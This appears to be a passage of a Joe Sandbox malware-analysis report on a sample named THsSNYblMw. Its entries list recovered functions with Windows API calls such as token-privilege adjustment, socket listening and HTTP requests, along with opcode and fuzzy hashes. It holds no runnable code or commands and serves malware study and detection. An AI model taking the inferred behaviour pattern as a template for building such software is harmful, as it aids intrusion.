Function 006AFE7C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

APIs

LookupPrivilegeValueA.ADVAPI32 ref: 006AFEF6
AdjustTokenPrivileges.ADVAPI32 ref: 006AFF26
GetLastError.KERNEL32 ref: 006AFF30

Strings

%s, xrefs: 006AFF3E

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: AdjustErrorLastLookupPrivilegePrivilegesTokenValue
String ID: %s
API String ID: 4244140340-620797490
Opcode ID: 6c791bb4c01fc26c469951e3acf1c760b9cd35fe10ce13bee0a408dd74bcb015
Instruction ID: 09ee26b6ad32aa87db6e6f0e5dc9ab2ea42e29e1efc68f6ba581403883c7927e
Opcode Fuzzy Hash: 6c791bb4c01fc26c469951e3acf1c760b9cd35fe10ce13bee0a408dd74bcb015
Instruction Fuzzy Hash: 77213972B00B449AEB10EBB1D4457ED73A6E759B88F84446A9E4D93B48EF34C629C780

Function 006B3FA4 Relevance: 6.1, APIs: 4, Instructions: 73sleepnetworkCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006B3FCB
Sleep.KERNEL32 ref: 006B401A
GetTickCount.KERNEL32 ref: 006B4020
WSAGetLastError.WS2_32 ref: 006B402A

Part of subcall function 006B4170: ioctlsocket.WS2_32 ref: 006B4192

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CountTick$ErrorLastSleepioctlsocket
String ID:
API String ID: 1121440892-0
Opcode ID: 5bf99a04f972f50d73caa8e18fab9a55977dc0de2e5c5f24fa58e569c163d702
Instruction ID: f04ced20ab497557fe997ca0da3d22f22621ec48f24eba316982f35c780065a1
Opcode Fuzzy Hash: 5bf99a04f972f50d73caa8e18fab9a55977dc0de2e5c5f24fa58e569c163d702
Instruction Fuzzy Hash: F6316A76B00B4086EB50EBA2E4943AC77B6F388B90F41022ADF6D93795CE31C956C344

Function 006AD784 Relevance: 4.9, APIs: 3, Instructions: 397memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B4864: htonl.WS2_32 ref: 006B4881

GetLastError.KERNEL32 ref: 006ADA74

Part of subcall function 006BADBC: GetCurrentProcess.KERNEL32 ref: 006BAE49

HeapCreate.KERNEL32 ref: 006ADA1B
HeapAlloc.KERNEL32 ref: 006ADA39

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Heap$AllocCreateCurrentErrorLastProcesshtonl
String ID:
API String ID: 3419463915-0
Opcode ID: c3210aeb038c61ac2ac1f21ef91652db53eb4006541b35b7449dfd283ffbea81
Instruction ID: 44d92736765bfe3f3b8177a77da37c942086c88dff1dff7d1b1ad952748a987e
Opcode Fuzzy Hash: c3210aeb038c61ac2ac1f21ef91652db53eb4006541b35b7449dfd283ffbea81
Instruction Fuzzy Hash: FCE180B6710B4183EB64DB35E8813AA63A2F789794F458135DB8B97B55EF3CE481C700

Function 006CA270 Relevance: 3.4, Strings: 2, Instructions: 884COMMONLIBRARYCODE

Download Yara Rule

Strings

<, xrefs: 006CA92E
, xrefs: 006CA923

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID: $<
API String ID: 0-428540627
Opcode ID: 58dc9353a9a7517b3c72d3f02fcc31b8c3ec0016d5ec06511f190bbd9e753e9c
Instruction ID: 3bbeba70453fc195770fc8748d2b237c339a7f21015212fce7a6d7646e47952c
Opcode Fuzzy Hash: 58dc9353a9a7517b3c72d3f02fcc31b8c3ec0016d5ec06511f190bbd9e753e9c
Instruction Fuzzy Hash: 3C92E3B2325A8087DB58CB1DE4A173AB7A1F3C8B84F44512AEB9B87794CE7CD551CB04

Function 0352D52F Relevance: 1.8, APIs: 1, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

_initp_misc_winsig.LIBCMT ref: 0352D563

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _initp_misc_winsig
String ID:
API String ID: 2710132595-0
Opcode ID: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
Instruction ID: 21d29f7d99d300ed590001ceaf30befe27c2b75b2de8375c8b97ad2a741b707f
Opcode Fuzzy Hash: f5eeccd02aae99182859cd355c685068cf330a2df8fc0dd784810881261ec21a
Instruction Fuzzy Hash: BCA1B531619E098FEF54FF75E898AAA37F2F3A8301321893A904AD7274DA7CD555CB40

Function 006CBAB0 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a07843770b9451d4ac558cc520e1e60a991d7943e83801c352df3725012db3a9
Instruction ID: 0ccdc08e36462111a4beba81e3fb35f2de26b1f3bac71964ea3686c5cba6131c
Opcode Fuzzy Hash: a07843770b9451d4ac558cc520e1e60a991d7943e83801c352df3725012db3a9
Instruction Fuzzy Hash: B05240B231898187D718CB1CE4A173AB7E2F3C9B80F44852AE7978B799CA3DD554DB40

Function 006CB140 Relevance: .6, Instructions: 592COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e962665f58d5d5727d455e658583aa4da8621b5749926b7e243a7ad70d2d8bb
Instruction ID: fc4a93ca7514fc3ff482f842e39f5af6d7caf61aaa021bee89a92a144310c7d9
Opcode Fuzzy Hash: 7e962665f58d5d5727d455e658583aa4da8621b5749926b7e243a7ad70d2d8bb
Instruction Fuzzy Hash: EA5274B27149818BD718CB1DE4A173AB7E2F3C9B80F44852AE7868B799CA3DD555CF00

Function 0351CBCB Relevance: .6, Instructions: 560COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 364b806096a3aa3b8234d976ad9a261243ac4bd49e8b4c0c2da675f77400e73a
Instruction ID: 8aa2c18e73925d0784262b7987b08417428b4595bc534c07276dbacccf93159d
Opcode Fuzzy Hash: 364b806096a3aa3b8234d976ad9a261243ac4bd49e8b4c0c2da675f77400e73a
Instruction Fuzzy Hash: 4802A135654F098BF768EB78D8417A673E2FB99304F184A3DC48BD7661EB78E4828740

Function 006AA280 Relevance: .4, Instructions: 404COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: de6e657ac89e492788c88d2d116a02571184d47b33d7bd9da32fec5ef69f3d9b
Instruction ID: 9c01b5e5ecba9c7b9b3a400ef47cdf7c85a688aa7ac7959f0f5d02c78f2ccee0
Opcode Fuzzy Hash: de6e657ac89e492788c88d2d116a02571184d47b33d7bd9da32fec5ef69f3d9b
Instruction Fuzzy Hash: 35E1D776304A4286DF20EBA5E4906AFA3B2F796784F904116EB4D87709EF39CD46CF41

Function 006A9D6C Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 029c5a49744544eed4c50f41df525117a3dc36abfd915d28d19825677fbafc4c
Instruction ID: b06c7d72c4bebd2b3df20b5cbaf69074201d022a13fbc2ad1e8cebdc7dfbd46b
Opcode Fuzzy Hash: 029c5a49744544eed4c50f41df525117a3dc36abfd915d28d19825677fbafc4c
Instruction Fuzzy Hash: D5D1D772304A4292DF20EBA5D8902EE6762F796788F940116EF4E97719EF35CE46CF40

Function 006CAE57 Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fee81b4d80be5685d5198290934ea415fe98b51e4b7cf41c28b3c9105e8cbe7
Instruction ID: b5a1759fe3a21a0492598ee95ddb536f8e2b71638e104978417e2bcadbcd9859
Opcode Fuzzy Hash: 8fee81b4d80be5685d5198290934ea415fe98b51e4b7cf41c28b3c9105e8cbe7
Instruction Fuzzy Hash: B7514CB6714A408BC724CF0CE09072AB7E2F3CCB94F84521AE38A87768DA3DD955CB40

Function 006D0020 Relevance: .0, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af8944cec50002d1b0f54b6e96182bda33dfa81c97c97e36524f9a3142b12cb5
Instruction ID: 9666022b11bed442015f535aa546be4b5ca9834fd6c56a20dc9c102a40a68b99
Opcode Fuzzy Hash: af8944cec50002d1b0f54b6e96182bda33dfa81c97c97e36524f9a3142b12cb5
Instruction Fuzzy Hash: B4F019C7E1DAD0BAF22357250C797D81F53A4B6A11B4DC04F8A8443743E4464C069312

Function 006D0630 Relevance: .0, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
Instruction ID: a8e0ccbb5fb3b3e59927962a8a4de99c3e506c0600ee1a188527bc6338e68fd7
Opcode Fuzzy Hash: 346746c420873f5115eefdb694fe7c4ecc9345e885989bf490d76ed756ab699a
Instruction Fuzzy Hash: 25D05ECBE1DBD049F36283384C3D3882F62A1E6A20B4C408F874406393E44A9811C311

Function 006D0050 Relevance: .0, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
Instruction ID: 5eadcd9e6634e30d5f516b21cccfbcbbb57ef2e54b974d08b56e30a3387cca15
Opcode Fuzzy Hash: 7077a8aff73e726294d064c0100d8d9a6f69cbf49f20d4d8a9feb05e8568bc26
Instruction Fuzzy Hash: 80C04C5BE189D097A7125A15086A3A42B53E5D2D3278A829A8D5143F43900A5C17A311

Function 006D04F0 Relevance: .0, Instructions: 10COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0284b84b73e54508ae1baf314946aefc64ac673574d479280f18263d8e85d7c
Instruction ID: bcbdc4ba56f26abed101cabadc09fc916b90db9ecc57eb769029733215e9814c
Opcode Fuzzy Hash: e0284b84b73e54508ae1baf314946aefc64ac673574d479280f18263d8e85d7c
Instruction Fuzzy Hash: 42C08CDBE5EFC4CAF32382680C7AAAE3EE298B2D1070E804BCF8402353A14A0C004361

Function 006D01D0 Relevance: .0, Instructions: 5COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c4463ba6808c05f1ead8adefacc78ec608ee0a7e45f5459bc4392cfb1edb3e2
Instruction ID: 72532d97a8223dfbe38a7a0a681753efc18bbb3aaaf179b99bc510a4662b7837
Opcode Fuzzy Hash: 5c4463ba6808c05f1ead8adefacc78ec608ee0a7e45f5459bc4392cfb1edb3e2
Instruction Fuzzy Hash: 40A0029FD59DE085F322D5A82C562D41E41B4F1A50B5F225BCE64273527001890257A5

Function 00402F69 Relevance: .0, Instructions: 4COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
Instruction ID: 82f505fb4451acb9e8d1e12f81e5a21f5fcc3540fe401e05c5c992db50528185
Opcode Fuzzy Hash: 19992302b57e0ae1e896caf69d358159d2cdd7c295cfb7410856e5c68f34a958
Instruction Fuzzy Hash: 62A0029244DD0290E3101B40D9413A07279D306240F0424A6421461072853D8520414C

Function 006D0078 Relevance: .0, Instructions: 2COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
Instruction ID: e1caecb6445a2499f8d0cd7f9dcdff8d8002f52e01be10325dabbee32111e1e2
Opcode Fuzzy Hash: 5d0d92956b155cbb8c87e226b7ab5f03fdae5ec1c9a88a8e3a78aeaa86237f57
Instruction Fuzzy Hash: 8390025650E3C009CA03D6241C601083F60B08290038B408B838042BC3D44C0508C322

Function 006BDEAC Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

DecodePointer.KERNEL32 ref: 006BDEBD
free.LIBCMT ref: 006BDEDA

Part of subcall function 006BD188: HeapFree.KERNEL32 ref: 006BD19E
Part of subcall function 006BD188: _errno.LIBCMT ref: 006BD1A8
Part of subcall function 006BD188: GetLastError.KERNEL32 ref: 006BD1B0

free.LIBCMT ref: 006BDEEF
free.LIBCMT ref: 006BDF10
free.LIBCMT ref: 006BDF25
free.LIBCMT ref: 006BDF39
free.LIBCMT ref: 006BDF45
free.LIBCMT ref: 006BDF70
EncodePointer.KERNEL32 ref: 006BDF78
free.LIBCMT ref: 006BDF91
free.LIBCMT ref: 006BDFAA
free.LIBCMT ref: 006BDFDB

Strings

p {, xrefs: 006BDFB7, 006BDFC8

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$Pointer$DecodeEncodeErrorFreeHeapLast_errno
String ID: p {
API String ID: 4099253644-4192419156
Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction ID: d7e011f04ccd4416b2ec5a6f61df1b18fd2247ddb139b105b41cbafb0e3414ee
Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction Fuzzy Hash: AD318EA9615B8591FE18DF15FC503F92363AF94BA4F1C1229D91A0F3A1EF2EC4A58300

Function 006B5268 Relevance: 22.7, APIs: 15, Instructions: 195networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

htonl.WS2_32 ref: 006B52C5
select.WS2_32 ref: 006B5333
__WSAFDIsSet.WS2_32 ref: 006B534B
accept.WS2_32 ref: 006B5368
ioctlsocket.WS2_32 ref: 006B5380
__WSAFDIsSet.WS2_32 ref: 006B5423
accept.WS2_32 ref: 006B5439

Part of subcall function 006B4170: ioctlsocket.WS2_32 ref: 006B4192

__WSAFDIsSet.WS2_32 ref: 006B54BB
__WSAFDIsSet.WS2_32 ref: 006B54D3
closesocket.WS2_32 ref: 006B5595

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: acceptioctlsocket$closesockethtonlselect
String ID:
API String ID: 2003300010-0
Opcode ID: 7628e35ad2332fee6b739d1ce5eb7cb20470cee2d2913517aafaa3cc703533d7
Instruction ID: 7c68bb168282c9df23d139ce284054a69ee78340ce74c69e142622ac4997e7b7
Opcode Fuzzy Hash: 7628e35ad2332fee6b739d1ce5eb7cb20470cee2d2913517aafaa3cc703533d7
Instruction Fuzzy Hash: 27918DB2715B919ADB60DF61E9407ED33A2F788799F000129EB4E47B58DF39D6A4CB00

Function 006BA328 Relevance: 19.7, APIs: 13, Instructions: 238stringCOMMONLIBRARYCODE

Download Yara Rule

APIs

_time64.LIBCMT ref: 006BA372
malloc.LIBCMT ref: 006BA39B
strtok.LIBCMT ref: 006BA3D7
strtok.LIBCMT ref: 006BA405
_time64.LIBCMT ref: 006BA413
malloc.LIBCMT ref: 006BA5BF
strtok.LIBCMT ref: 006BA612
strtok.LIBCMT ref: 006BA694

Part of subcall function 006BF670: _getptd.LIBCMT ref: 006BF68F

free.LIBCMT ref: 006BA6A5

Part of subcall function 006BD188: HeapFree.KERNEL32 ref: 006BD19E
Part of subcall function 006BD188: _errno.LIBCMT ref: 006BD1A8
Part of subcall function 006BD188: GetLastError.KERNEL32 ref: 006BD1B0

malloc.LIBCMT ref: 006BA6BD
strtok.LIBCMT ref: 006BA6EF

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: strtok$malloc$_time64$ErrorFreeHeapLast_errno_getptdfree
String ID:
API String ID: 620445413-0
Opcode ID: d25b6128ed1f2a7143d718cd71c0dc24c777b6b99499086e71dd0509d51768d1
Instruction ID: bc945b1681b7e83683eb6cd3c7f41cda2230e48f97c361b38d180c788ed8d6bc
Opcode Fuzzy Hash: d25b6128ed1f2a7143d718cd71c0dc24c777b6b99499086e71dd0509d51768d1
Instruction Fuzzy Hash: 13A1D0F96117C496EB24CF95F8503AA73A3F7047A0F145229D92A4B3A4EF3AD4A1C701

Function 006AE8D8 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 130networksleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 006AE975

Part of subcall function 006BD57C: _errno.LIBCMT ref: 006BD5B3
Part of subcall function 006BD57C: _invalid_parameter_noinfo.LIBCMT ref: 006BD5BE

_snprintf.LIBCMT ref: 006AE991
_snprintf.LIBCMT ref: 006AEA07
_snprintf.LIBCMT ref: 006AEA1E

Part of subcall function 006BD57C: _flsbuf.LIBCMT ref: 006BD61D

HttpOpenRequestA.WININET ref: 006AEA6A
HttpSendRequestA.WININET ref: 006AEA9D
InternetCloseHandle.WININET ref: 006AEAB2
Sleep.KERNEL32 ref: 006AEABD
InternetCloseHandle.WININET ref: 006AEAD0

Strings

*/*, xrefs: 006AE8FE
%s%s, xrefs: 006AEA13

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
